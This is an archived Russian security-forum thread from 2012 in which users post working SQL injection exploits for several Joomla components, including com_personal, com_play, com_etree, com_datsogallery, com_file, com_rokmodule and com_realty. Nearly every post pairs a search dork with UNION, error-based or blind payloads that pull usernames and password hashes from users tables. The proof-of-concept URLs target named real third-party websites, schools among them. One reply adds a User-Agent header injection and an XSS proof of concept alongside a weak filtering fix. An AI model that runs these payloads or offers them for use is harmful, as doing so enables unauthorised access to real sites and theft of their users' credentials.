ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.02.2012, 15:19
|
|
Познающий
Регистрация: 23.06.2008
Сообщений: 34
Провел на форуме:
98050
Репутация:
45
|
|
Joomla com_personal Multiple SQL-inj Vuln
# Date: 18.02.2012
# Author: Mach1ne
Множественные уязвимые параметры:
http://localhost/[PATH/index.php?option=com_personal&view=detalle&trbId=[SQL]
http://localhost/[PATH]/index.php?option=com_personal&view=personal&grupo_id=[SQL]
http://localhost/[PATH]/index.php?option=com_personal&id=[SQL]
PoC:
http://www.ceit.es/index.php?option=com_personal&view=detalle&trbId=-2828+UNION+ALL+SELECT+NULL,VERSION(),NULL,NULL,NUL L,NULL,NULL--&catId=91&prsId=1&Itemid=25&lang=en
http://www.ciberes.org/index.php?option=com_personal&view=personal&grupo_ id=4+union+all+select+1,concat(username,0x3a,passw ord),3,4,5,6,7,8,9,10,11+from+ciber_users--+&Itemid=77
http://www.cerpamid.co.cu/index.php?option=com_personal&id=65+AND+(SELECT+65 86+FROM(SELECT+COUNT(*),CONCAT(user(),(version()), FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACT ER_SETS+GROUP%20BY+x)a)&actived=1&active=1&lang=en
|
|
|
18.02.2012, 20:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Joomla "com_play" component SQL Injection(два разных компонента, дорк один )
Dork:
Код:
Code:
inurl:"?option=com_play"
1) Уязвим параметр vid, что позволяет провести SQL-injection.
Эксплyатация:
Код:
Code:
http://site.ltd/index.php?option=com_play&Itemid=85&vid=-3+union+select+1,2,3,version(),user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+f
Уязвимый код в play.php:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vid'[/COLOR][COLOR="#007700"]]))[/COLOR][COLOR="#0000BB"]$video_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'vid'[/COLOR][COLOR="#007700"]];
else[/COLOR][COLOR="#0000BB"]$video_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
...
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM #__hwdvidsvideos WHERE id =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$video_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]and published = 1"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
PoC:
Код:
Code:
http://www.walthamstowstadium.co.uk/index.php?option=com_play&Itemid=57&vid=-3+union+select+1,2,3,version(),user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+f
--
2) Уязвим параметр playid, что позволяет провести SQL-injection.
Эксплyатация:
Код:
Code:
http://site.ltd/index.php?option=com_play&view=play&playid=-19+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15--+f
PoC:
Код:
Code:
http://www.detnorsketeatret.no/index.php?option=com_play&view=play&playid=-19+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15--+f
© Ereee
|
|
|
|
20.02.2012, 16:06
|
|
Познающий
Регистрация: 23.06.2008
Сообщений: 34
Провел на форуме:
98050
Репутация:
45
|
|
Joomla com_etree Blind SQL-inj Vuln
# Date: 20.02.2012
# Author: Mach1ne
Уязвимый параметр:
http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=us er&user_id=[SQL]
http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=ca tegory&id=[SQL]
PoC:
http://gradientshift.com/harrisonCounty/index.php?option=com_etree&view=displays&layout=ca tegory&id=6'+and+2=2
http://www.roberts.k12.mt.us/site/index.php?option=com_etree&view=displays&layout=ca tegory&id=7'+and+2=2
http://www.canyoncreekschool.org/?option=com_etree&view=displays&layout=user&user_i d=5'+and+2=2
GET parameter 'user_id' is vulnerable.
---
Place: GET
Parameter: user_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_etree&view=displays&layout=user&user_id =5' AND 425=425 AND 'PbgE'='PbgE
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: option=com_etree&view=displays&layout=user&user_id =5' AND SLEEP(5) AND 'bLot'='bLot
---
|
|
|
|
08.03.2012, 09:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Joomla "com_datsogallery" component db prefix discolure
Dork:
Код:
Code:
inurl:"?option=com_datsogallery"
Exploit:
Код:
Code:
1. Находим любой сайт через дорк.
2. Заходим по ссылке два раза:
http://site.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
3. Видим:
DB function failed with error number 1062
Duplicate entry 'bla-bla' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ('bla-bla')
PoC:
Код:
Code:
http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
http://www.chexov.info/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
и т.д.
Исправление:
Код:
Code:
Нужно сделать нумерацию. Обратитесь к разработчику(любому кодеру).
P.S. Просьба не стучать в ПМ с вопросами "Как юзать баг?", "Как залить шелл через эту уязвимость?".
P.S.S. 0day
© Ereee
|
|
|
|
10.03.2012, 14:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Ereee
Ereee said:
Joomla "com_datsogallery" component db prefix discolure
Dork:
Код:
Code:
inurl:"?option=com_datsogallery"
Я думаю лучше юзать скуль в данном случае.
Код:
Code:
GET http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
Duplicate entry '5.0.26-log' for key 1
Код:
Code:
GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
Duplicate entry '5.5.18-cll' for key 'group_key'
Код:
Code:
GET http://www.chexov.info/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
Duplicate entry '5.0.90-log' for key 1
|
|
|
|
15.03.2012, 17:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Сообщение от Ereee
Ereee said:
Joomla "com_datsogallery" component db prefix discolure
Dork:
Код:
Code:
inurl:"?option=com_datsogallery"
Exploit:
Код:
Code:
1. Находим любой сайт через дорк.
2. Заходим по ссылке два раза:
http://site.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
3. Видим:
DB function failed with error number 1062
Duplicate entry 'bla-bla' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ('bla-bla')
PoC:
Код:
Code:
http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
http://www.chexov.info/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
и т.д.
Исправление:
Код:
Code:
Нужно сделать нумерацию. Обратитесь к разработчику(любому кодеру).
P.S. Просьба не стучать в ПМ с вопросами "Как юзать баг?", "Как залить шелл через эту уязвимость?".
P.S.S. 0day
© Ereee http://joomlaforum.ru/index.php?topic=33952.0;wap2
|
|
|
|
22.03.2012, 08:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Joomla "com_file" component SQL Injection
Уязвим параметр year, что позволяет провести SQL-injection.
Эксплyатация:
Код:
Code:
http://site.ltd/index.php?option=com_file&action=list_files&year=-2011'+union(select+1,concat_ws(0x3a,username,password,usertype),3,4,5,6+from+jos_users+limit+0,1)--+g
PoC:
Код:
Code:
http://www.crandalltexas.com/?option=com_file&action=list_files&year=-2011'+union(select+1,concat_ws(0x3a,username,password,usertype),3,4,5,6+from+jos_users+limit+0,1)--+g
P.S. Скоро будут коды, как хэш сбрутят.
|
|
|
|
23.03.2012, 20:33
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Joomla "com_rokmodule" component SQL Injection
Уязвим параметр moduleid, что позволяет провести SQL-injection.
Эксплyатация:
Код:
Code:
index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=[SQLblind]
PoC:
Код:
Code:
http://sdf.com.ua/index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=20+and+1=1&offset=_OFFSET_
true
Код:
Code:
http://sdf.com.ua/index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=20+and+1=1&offset=_OFFSET_
false
Уязвимый код:
components/com_rokmodule/rokmodule.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$module_name[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT DISTINCT * from #__modules where title='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$module_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]; }
else {
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT DISTINCT * from #__modules where id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$module_id[/COLOR][COLOR="#007700"]; }[/COLOR][/COLOR]
|
|
|
|
24.03.2012, 08:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Joomla "com_realty" component SQL Injection
Уязвим параметр id, что позволяет провести SQL-injection.
Эксплyатация:
Код:
Code:
http://site.ltd/?option=com_realty&Itemid=60&task=show_offer&id=-174+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,username,password,usertype,0x4861636b6564206279204572656565),29,30,31,32,33+from+jos_users+limit+0,1--+d
PoC:
Код:
Code:
http://expert-dubna.ru/?option=com_realty&Itemid=60&task=show_offer&id=-174+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,username,password,usertype,0x4861636b6564206279204572656565),29,30,31,32,33+from+jos_users+limit+0,1--+d
|
|
|
|
02.04.2012, 10:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
Сообщение от None
Исправление
Joomla "com_datsogallery" sqli
Сообщение от Osstudio
Osstudio said:
http://joomlaforum.ru/index.php?topic=33952.0;wap2
Плохое исправление, в если пофиксить сайт таким образом, sql inj не будет, но останется возможность sixss и вывод ошибки также не исчезнет
SIXSS PoC
Сообщение от None
http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent:
alert(/xss/)
Для корректного исправления нужно добавить в предлагаемый код что-то вроде strip_tags, и error_reporting чтобы ошибки не выдавать:
Код:
Code:
error_reporting(0);
$browser = strip_tags($_SERVER['HTTP_USER_AGENT']);
$browser_tmp = ' '.strtoupper($browser);
if ((strpos($browser_tmp, 'SELECT')) or
(strpos($browser_tmp, 'DELETE')) or
(strpos($browser_tmp, 'UPDATE')) or
(strpos($browser_tmp, 'INSERT')) or
(strpos($browser_tmp, ' FROM ')) or
(strpos($browser_tmp, ' INTO ')) or
(strpos($browser_tmp, 'VALUES'))
) {
die('SQL-injection rejected.');
}
Сообщение от Expl0ited
Expl0ited said:
Я думаю лучше юзать скуль в данном случае.
Сообщение от None
GET http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
Duplicate entry '5.0.26-log' for key 1
" if author else f"
Expl0ited said:
Я думаю лучше юзать скуль в данном случае.
Сообщение от None
GET http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
Duplicate entry '5.0.26-log' for key 1
Или
Сообщение от None
GET http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla') on duplicate key update a=(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2)) x from jos_users group by x)a)-- -
Duplicate entry 'admin
1
' for key 1
На некоторых сайтах один из вариантов не работает
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид